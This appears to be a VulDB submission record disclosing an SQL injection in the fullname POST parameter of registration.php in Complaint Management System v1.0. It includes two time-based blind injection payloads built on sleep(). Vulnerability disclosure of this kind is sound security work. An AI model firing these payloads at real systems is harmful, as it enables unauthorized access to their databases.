| Title | Complaint Management System v1.0 /Complaint Management System/users/registration.php POST parameter fullname exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in Complaint Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /Complaint Management System/users/registration.php post parameter fullname.
Payload1:fullname=a' and (select 1 from (select(sleep(10)))x) and 't'='t
Payload2:fullname=a' and (select 1 from (select(sleep(15)))x) and 't'='t |
|---|
| Source | ⚠️ https://github.com/HibuMk/bug_report/blob/main/SQLi.md |
|---|
| User | mckayyang (UID 45478) |
|---|
| Submission | 04/22/2023 05:07 (3 years ago) |
|---|
| Moderation | 04/22/2023 17:49 (13 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 227228 [SourceCodester Complaint Management System 1.0 POST Parameter users/registration.php fullname sql injection] |
|---|
| Points | 19 |
|---|